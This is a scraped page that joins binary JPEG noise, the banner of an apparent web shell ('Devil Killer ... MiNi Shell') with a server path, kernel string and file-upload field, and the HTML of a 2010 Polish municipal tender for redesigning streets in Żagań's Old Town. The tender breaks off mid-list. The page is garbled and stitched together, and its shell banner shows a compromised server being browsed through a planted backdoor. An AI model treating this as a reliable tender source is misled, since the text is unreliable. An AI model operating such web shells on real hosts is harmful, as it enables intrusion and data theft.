JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/235422-N-2010.html

<p class="kh_header"><b>Żagań: Opracowanie projektu budowlano-wykonawczego przebudowy nawierzchni jezdni 
i chodników: ul. Rynek, II Armii Wojska Polskiego, Keplera, Długiej,  Brackiej,  Szprotawskiej (do ul. Wałowej) i Placu Słowiańskiego w Żaganiu  wraz z aktualizacją kosztorysów, w ramach zadania pn. Przebudowa ulic w  rejonie 
Starego Miasta (Lokalny Program Rewitalizacji).</b><br>
<b>Numer ogłoszenia: 235422 - 2010; data zamieszczenia: 03.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 068 4771040, faks 068 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu budowlano-wykonawczego przebudowy nawierzchni jezdni 
i chodników: ul. Rynek, II Armii Wojska Polskiego, Keplera, Długiej,  Brackiej,  Szprotawskiej (do ul. Wałowej) i Placu Słowiańskiego w Żaganiu  wraz z aktualizacją kosztorysów, w ramach zadania pn. Przebudowa ulic w  rejonie 
Starego Miasta (Lokalny Program Rewitalizacji)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opracowanie projektu budowlano-wykonawczego przebudowy nawierzchni jezdni 
   i chodników: ul. Rynek, II Armii Wojska Polskiego, Keplera, Długiej,  Brackiej, 
   Szprotawskiej (do ul. Wałowej) i Placu Słowiańskiego w Żaganiu  wraz z 
   aktualizacją kosztorysów, w ramach zadania pn. Przebudowa ulic w  rejonie 
   Starego Miasta (Lokalny Program Rewitalizacji). 
   Finansowanie: środki własne.
   Uwaga! Zamawiający posiada projekt budowlany uzgodniony u   Lubuskiego 
   Wojewódzkiego Konserwatora Zabytków, roboty zostały zgłoszone do Starostwa 
   Powiatowego w Żaganiu, który może posłużyć jako koncepcja dla sporządzenia 
   projektu budowlano-wykonawczego.
1.1. Zakres prac przewidzianych do wykonania w szczególności obejmuje :
   a) dokonanie  korekty zaproponowanych w posiadanym  projekcie  budowlanym  
       rozwiązań - jeżeli Wykonawca będzie bazował  na  sporządzonym projekcie  
       budowlanym;
   b) sporządzenie  projektu wykonawczego;
   c) sporządzenie  Szczegółowych Specyfikacji Technicznych wykonania i odbioru 
       robót  budowlanych;
   d) sporządzenie /aktualizacja kosztorysów (inwestorskiego, ofertowego,  
       przedmiaru robót);
   e) sporządzenie rysunków wykonawczych;
   f) wykonanie projektu docelowej organizacji ruchu /zatwierdzonego przez 
      odpowiedni organ /5  egz./;
   g) wykonanie opracowania  z zakresu ochrony  środowiska - jeżeli jest ono 
       wymagane  na podstawie ustawy z dnia 3  października 2008 r. o 
       udostępnieniu  informacji o środowisku i jego ochronie, udziale społeczeństwa 
       w ochronie   środowiska oraz o ocenach oddziaływania na  środowisko- 
       uzyskanie decyzji środowiskowej /Dz. U. Nr 199, poz.1227 z 2008 r. /.  
1.2. Wykonawca będzie zobowiązany uwzględnić następujące uwagi
      Zamawiającego  :  Ustalenia ogólne dla wszystkich ulic:
   1. Projekt wykonawczy powinien zawierać w szczególności:
    a) opracowanie powtarzalnego  ( dla wszystkich ulic ) rozwiązania
        konstrukcyjnego dla jezdni i chodników wraz z dokładnym rozrysowaniem     
        sposobu układania kostki (wzoru ) na poszczególnych elementach ( jezdnia , 
        chodniki ) . W przypadku chodników  rozrysowanie szczegółowo sposobu  
        układania w miejscach o zmiennej szerokości  oraz na placach; 
    b) przyjąć w całym opracowaniu kostkę granitową ciętą i płyty granitowe oraz 
        krawężniki granitowe (lub wariantowo  granitopodobne );
    c) projekt na zmianę lokalizacji lamp i wpustów ulicznych :
      - kanalizacja deszczowa -  przestawienie ( regulacja ) wpustów  istniejących 
        jaki i  lokalizacja nowych  wpustów wraz z przykanalikami ( ewentualnie     
        studni )
     - oświetlenie uliczne - przestawienie lamp w miejscach kolidujących z 
       projektowanymi  drogami, chodnikami . W opracowaniu należy przyjąć  jeden 
       rodzaj wpustów  ulicznych, włazów do studni kanalizacyjnych, pokryw studni 
       telefonicznych itd. , itp.;
   d) wszystkie słupki pod znaki  oraz elementy wygrodzenia zaprojektować w 
       jednym  stylu  (stylizowane np. pod oświetlenie uliczne );
   e) opracować szczegółową specyfikację techniczną  (uwzględniającą 
       zaproponowane rozwiązania,  a nie typowe powszechnie stosowane 
       sformułowania dające Wykonawcy możliwość dowolnego interpretowania 
       zapisów); 
   f) wszystkie przejścia dla pieszych i linie segregacyjnie powinny być wykonane z 
       użyciem różnych kolorów  kostki wyróżniających  te elementy z pozostałej 
       nawierzchni ( szczegóły  układania kostki w takim miejscu ); 
   g) w miejscach przejść dla pieszych nie stosować krawężników - nawierzchnia   
       chodnika ma się licować z nawierzchnią drogi;
   h) opracować projekty zagospodarowania zieleńców znajdujących się w obrębie 
       opracowania w tym :  nowe trawniki  i nowe nasadzenia  ( lub w zależności  
       od  miejsca ewentualne przesadzenia lub dosadzenia );
    i) w miejscach gdzie szerokość chodnika będzie wystarczająco  duża 
       przewidzieć ławki i kosze na śmieci, gazony, stojaki na rowery oraz 
       konstrukcje kwietnikowe np. kolumny kwiatowe; 

       Propozycje zmian w planie sytuacyjnym dla poszczególnych ulic:
   2. Ul.  II  ARMII WP: 
     a) zakres opracowania należy dostosować do zakresu prac związanych z 
         budową  ronda w rejonie Pl. Wolności ( realizowanego przez ZDW Zielona 
         Góra);  
     b) uwzględnić w projekcie wymianę nawierzchni  parkingu na działce nr 1142  
         (w sąsiedztwie Kościoła ); 
     c)  przesunąć z projektowanego parkingu na działce 984 ( przy spichlerzu) 
          lampę  - lampy oświetleniowe,  zyskując kolejne miejsca parkingowe; 
      d) zlikwidować żywopłot wzdłuż ulicy, a zastosować np. ładne ozdobne  
          wygrodzenie aby wymusić na pieszych korzystanie tylko z przejść dla  
          pieszych, uwzględnić wymianę nawierzchni przy trzech pawilonach 
          handlowych  i kiosku w rejonie skrzyżowania z ul. Rynek.
     3. UL. RYNEK
     a) droga między apteką a restauracją  Kepler - na jednym poziomie 
         ewentualnie  oddzielenie kolorami  ale razem z miejscem na fontannę;  
     b) opracować projekt  przyłączy ( woda, kanalizacja, energia elektryczna ) do   
         projektowanej fontanny;
     c) przenieść przystanek na przeciwko projektowanej fontanny; 
     d) miejsce po zatoczce autobusowej i fragment dalej,  wykorzystać na zatokę  
         postojową (parkingową );  
     e) zmniejszyć szerokość chodnika od strony działek 842/2,843, 844,845 aby      
         zyskać miejsce na wykonanie parkingu po drugiej stronie ulicy; 
      f) zagospodarować narożnik w rejonie budynku Rynek 13 - 14 np. na bogaty    
         element zieleni ( wielki gazon ) lub coś innego;
      g) przeprojektować połączenie z ul. Warszawską w taki sposób aby  można  
          było  wjeżdżać,  nie  robić parkingu); 
      h) zaprojektować zatokę postojową przy budynku Rynek 19 , 20; 
      i) zapewnić dojazd do budynków w środku Rynku; 
      j)  ewentualne martwe pola wykonać w innym kolorze kostki;
      k) przyjąć likwidację postoju TAXI z obecnego miejsca na ulicę Bracką.
      4. UL.  KEPLERA
      a) w rejonie skrzyżowania z ul. Bracką - Rynek zlikwidować część zieleńca;
      b) dokonać korekty skrzyżowania Keplera -Bracka - Sobieskiego ( na ile 
          pozwoli plan miejscowy) aby wykonać normalne czterowylotowe 
          skrzyżowanie dróg  przecinających się pod kątem prostym; 
      c) sprawdzić dokładnie lokalizację zatoki autobusowej pod kątem zgodności z 
          normami;
      d) ująć zagospodarowanie zieleni na skrzyżowaniu ul. Keplera z Długą 
          (okolice   kiosku);
      e) zaprojektować  zatokę postojową na odcinku  od ul. Długiej do      
          Słowackiego   (po stronie budynków Keplera nr 12, 16);
       f) zaprojektować  zatokę postojową między ul. Słowackiego a Gimnazjalną (    
          po stronie budynków Keplera nr 20 - 23);
      g) zaprojektować  wjazd do przejazdu bramnego przy 45 - 46 ( neo-net) oraz  
          do bram np.18; 
      h) zaprojektować zatokę postojową  przy restauracji Piastowskiej (budynek nr  
           27)  kosztem chodnika przy WKU (budynek nr 24)  i skorygować przebieg 
           o   koncepcję przebudowy skrzyżowania  ul. Jana Pawła II - Armii 
           Krajowej - Piłsudskiego - Keplera  na rondo, które posiada  ZDW  Zielona 
           Góra; 
      5. UL. DŁUGA
      a) lampy na środku chodnika do przestawienia;
      b) przy budynku nr 1 - 1b rozważyć możliwość wykonania parkingu zamiast 
          zatoki postojowej;
      c) uwzględnić wymianę nawierzchni i zagospodarowanie terenu zielonego w 
          rejonie skrzyżowania ul.  Długiej z Bracką (wejście do budynku nr 2). 
      6. UL. BRACKA
       a) zaprojektować zatokę postojową dla TAXI  przy warzywniakach (od ul. 
           Keplera   do ul. Długiej); 
       b) zaprojektować  zatokę postojową przy nowych kamienicach (18 - 24) 
           kosztem  regulacji drogi i parkingu po drugiej stronie; 
       c) zagospodarować zieleniec  koło apteki- budynek nr 13, 15, na parking; 
       d) opracować projekt zagospodarowania zieleńca uwzględniający istniejący   
           pomnik i rzeźbę.
     7. PL. SŁOWIAŃSKI
       a) cały projekt do przerobienia -  ze względu na istniejący parking;  
       b) najlepiej jednoprzestrzenny bez różnicowania wysokości na  chodniki  i 
          jezdnię; 
       c) zaprojektować miejsce parkingowe (zatoka postojowa ) przed wejściem do  
           Urzędu (budynek  nr 17 ) oraz podjazd dla niepełnosprawnych.
      8.UL. SZPROTAWSKA
       a) zaprojektować zatokę postojową po stronie Pałacu, między wjazdem do 
           Pałacu a kawiarnią; 
       b) uwzględnić zagospodarowanie terenów zielonych przed Pałacem; 
       c) przesunąć  ( przerobić )  zatokę na przeciwko wejścia do Pałacu
       d) uwzględnić wjazd  na zaplecze budynku położonego na działce 961
           (  dawna     restauracja). 
      9.Projekt należy opracować w taki sposób aby każda ulica stanowiła odrębną 
        część opracowania pasującą do pozostałych części i tak też należy 
        sporządzić kosztorysy.
    10.W przypadku konieczności ustawienia dodatkowych wpustów, studni,  
        korekty lokalizacji lamp należy przedmiotowe zmiany uzgodnić z właścicielem 
        (zarządcą ) danej sieci.
    11.Wykonanie i oddanie projektu  ma nastąpić   w dwóch etapach:
        W pierwszym etapie:		
        - ul. Szprotawska				
        - Pl. Słowiański						
        - ul. Bracka		
        W drugim etapie:
        - ul. Długa
        -  ul. Keplera
        - ul. Rynek
        - ul. II Armii WP
1.3. Wykonawca jest zobowiązany uzyskać wszystkie uzgodnienia i  opinie, jak 
      również wszystkie  uzgodnienia branżowe, zatwierdzenia, pozwolenia,
      sprawdzenia,  wynikające z obowiązujących przepisów prowadzące  do
      uzyskania  decyzji o  zezwoleniu  na realizację inwestycji /lub  zgłoszenia 
      robót/ - Dz. U. z 2008 r. Nr 154, poz.958.     
1.4. Dokumentacja projektowa  powinna być opracowana zgodnie z 
      obowiązującymi  przepisami prawa i zasadami wiedzy technicznej,  a 
      mianowicie: zgodnie z ustawą z dnia 07 lipca 1994 r Prawo   budowlane / tj. 
      Dz. U. z 2006 r. Nr 156, poz.1118 z późn. zm./  oraz Rozporządzeniem Ministra 
      Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i 
      formy dokumentacji projektowej, specyfikacji  technicznych wykonania i 
      odbioru robót budowlanych  oraz programu  funkcjonalno-użytkowego /Dz. U.  
      Nr.  202, poz.2072/. 
1.5. Projekt budowlano - wykonawczy należy sporządzić w pięciu egzemplarzach w 
      wersji papierowej + wersja elektroniczna w plikach ogólnodostępnych /np. pdf/.
1.6. Zamawiający nie dopuszcza wskazywania w dokumentacji projektowej   
      znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione 
      specyfiką przedmiotu zamówienia i Wykonawca nie może opisać przedmiotu za 
      pomocą dostatecznie dokładnych określeń, a  wskazaniu takiemu  towarzyszą 
      wyrazy  lub równoważny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 71.42.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunki udziału w postępowaniu  oraz opis sposobu  dokonywania oceny
    spełnienia tych warunków.
1.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają
      warunki  dotyczące : 
  a) posiadania uprawnień  do wykonywania określonej działalności lub czynności, 
      jeżeli przepisy prawa  nakładają obowiązek ich posiadania;
  b) posiadania  wiedzy i doświadczenia;
  c) dysponowania odpowiednim potencjałem technicznym oraz osobami  zdolnymi 
      do wykonania zamówienia;
  d) sytuacji ekonomicznej i finansowej.
1.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia np. w formie 
       konsorcjum.
1.3. W przypadku wspólnego ubiegania się, Wykonawcy ustanawiają pełnomocnika 
       do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego 
       albo do reprezentowania w postępowaniu i zawarcia  umowy w  sprawie 
       zamówienia publicznego. Na potwierdzenie ustanowienia pełnomocnika 
       Wykonawcy załączają do  oferty stosowne pełnomocnictwo.  
1.4. Jeżeli oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia 
       zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie 
       zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
1.5. Opis sposobu dokonywania oceny spełnienia warunków określonych w 
       punkcie 1.1: 
   a) w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania 
       określonej działalności lub czynności, Zamawiający nie żąda od Wykonawcy 
       potwierdzenia posiadania uprawnień do wykonywania działalności, gdyż 
       przepisy prawa nie nakładają  obowiązku posiadania  takowych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za 
       spełniającego ten wymóg Wykonawcę,  który w okresie ostatnich trzech  lat 
       przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest 
       krótszy- w tym okresie,  wykonał  co najmniej 2 usługi projektowe  
       dotyczące    wykonania  projektów  budowlano- wykonawczych  przebudowy 
       dróg i  chodników   wraz z małą   architekturą wokół  - typu  zieleń, ławki, 
       oświetlenie, kosze, gazony/.  
       Na potwierdzenie spełnienia tego  warunku Wykonawca złoży wraz z ofertą 
       dokument określony w punkcie III.4.1. ogłoszenia, z załączonymi  do niego 
       dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. 
       Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić  
       łącznie. Wykonawca może polegać na wiedzy i doświadczeniu innych 
       podmiotów, niezależnie od charakteru prawnego łączących go z nimi 
       stosunków.  Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
       Zamawiającemu, iż będzie dysponował zasobami  niezbędnymi do realizacji 
       zamówienia, w  szczególności przedstawiając w tym celu pisemne 
       zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych 
       zasobów na okres  korzystania z nich przy wykonywaniu zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c) w zakresie dysponowania odpowiednim potencjałem technicznym oraz osobami    
    zdolnymi do wykonania zamówienia,  Zamawiający uzna za spełniającego te 
    wymogi  tego Wykonawcę, który będzie dysponował osobami  posiadającymi 
    uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie 
    zgodnie z ustawą z dnia 7 lipca 1994 r, Prawo budowlane (tekst jednolity Dz.U. 
    z 2006 r. Br 156, poz. 1118 z późn. zm.), do projektowania  w specjalnościach : 
    - architektonicznej, 
    -  konstrukcyjno -budowlanej, 
    - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
      elektroenergetycznych,
    - instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, 
      gazowych, wodociągowych i kanalizacyjnych, 
    przynależącymi do właściwej Izby samorządu zawodowego. Na potwierdzenie 
    spełnienia  tego warunku, Wykonawca złoży  wraz z  ofertą dokument określony 
    w punkcie III.4.1  ogłoszenia.  Wykonawcy występujący  wspólnie  powyższy 
    warunek mogą spełnić łącznie.  W zakresie dysponowania odpowiednim 
    potencjałem technicznym oraz osobami zdolnymi do wykonania  zamówienia 
    Wykonawca może polegać na potencjale technicznym innych podmiotów, 
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca 
    w takiej sytuacji zobowiązany jest udowodnić  Zamawiającemu, iż będzie 
    dysponował  zasobami niezbędnymi do realizacji  zamówienia, w  szczególności 
    przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania 
    mu do dyspozycji  niezbędnych zasobów na okres  korzystania z  nich przy 
    wykonywaniu zamówienia, oraz składając dokumenty   określone w punkcie 
    III.4.2.;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d) w zakresie sytuacji ekonomicznej i finansowej,  Zamawiający uzna za 
    spełniającego te wymogi tego Wykonawcę, który  będzie ubezpieczony   
    od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej 
    związanej z przedmiotem zamówienia  i na potwierdzenie  spełnienia tego 
    warunku złoży wraz z ofertą  dokument określony w  punkcie III.4.1. 
    ogłoszenia. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić 
    łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

